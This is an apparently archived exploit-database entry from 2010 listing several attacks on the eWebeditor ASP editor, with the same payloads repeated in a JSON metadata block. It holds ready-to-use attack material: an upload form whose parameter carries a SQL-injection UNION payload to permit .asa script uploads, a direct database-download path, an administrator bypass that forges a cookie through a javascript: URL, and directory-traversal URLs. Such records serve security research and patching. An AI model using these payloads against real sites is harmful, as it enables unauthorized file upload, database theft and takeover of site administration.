Search...

eWebeditor ASP Version - Multiple Vulnerabilities

2010-01-29T00:00:00

ID EXPLOITPACK:35CFB701E6202118C4588E9A6ABF8ED3
Type exploitpack
Reporter anonymous
Modified 2010-01-29T00:00:00

Description

eWebeditor ASP Version - Multiple Vulnerabilities

                                        
                                            #################################################################
# Application Info:
# Name: eWebeditor
# Version: ASP
#################################################################
Vulnerability:

=======================
Arbitrary File Upload
=======================
&lt;form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data "&gt; 
&lt;p align="center"&gt; 
&lt;input type=file name=uploadfile size=100&gt;&lt;br&gt; &lt;br&gt; 
&lt;input type=submit value=Upload&gt;  &lt;/p&gt;
&lt;/form&gt; 


=======================
Arbitrary File Upload 2
=======================
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup 


=======================
Database Disclosure
=======================
http://site.com/ewebeditor/db/ewebeditor.mdb 


=======================
Administrator bypass
=======================
http://site.com/eWebEditor/admin/login.asp

put this code instead URL
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));


=======================
Directory Traversal
=======================
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..


=======================
Directory Traversal 2
=======================
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:05:49", "references": [], "description": "\neWebeditor ASP Version - Multiple Vulnerabilities", "edition": 1, "reporter": "anonymous", "exploitpack": {"type": "webapps", "platform": "asp"}, "published": "2010-01-29T00:00:00", "title": "eWebeditor ASP Version - Multiple Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:05:49", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2020-04-01T19:05:49", "rev": 2}, "vulnersScore": 0.6}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-01-29T00:00:00", "id": "EXPLOITPACK:35CFB701E6202118C4588E9A6ABF8ED3", "href": "", "viewCount": 2, "sourceData": "#################################################################\n# Application Info:\n# Name: eWebeditor\n# Version: ASP\n#################################################################\nVulnerability:\n\n=======================\nArbitrary File Upload\n=======================\n<form action = \"http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a \"method = post name = myform enctype =\" multipart / form-data \"> \n<p align=\"center\"> \n<input type=file name=uploadfile size=100><br> <br> \n<input type=submit value=Upload>\u00a0 </p>\n</form> \n\n\n=======================\nArbitrary File Upload 2\n=======================\nhttp://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup \n\n\n=======================\nDatabase Disclosure\n=======================\nhttp://site.com/ewebeditor/db/ewebeditor.mdb \n\n\n=======================\nAdministrator bypass\n=======================\nhttp://site.com/eWebEditor/admin/login.asp\n\nput this code instead URL\njavascript: alert (document.cookie = \"adminpass =\" + escape ( \"admin\"));\n\n\n=======================\nDirectory Traversal\n=======================\nhttp://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..\n\n\n=======================\nDirectory Traversal 2\n=======================\nhttp://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..", "cvss": {"score": 0.0, "vector": "NONE"}}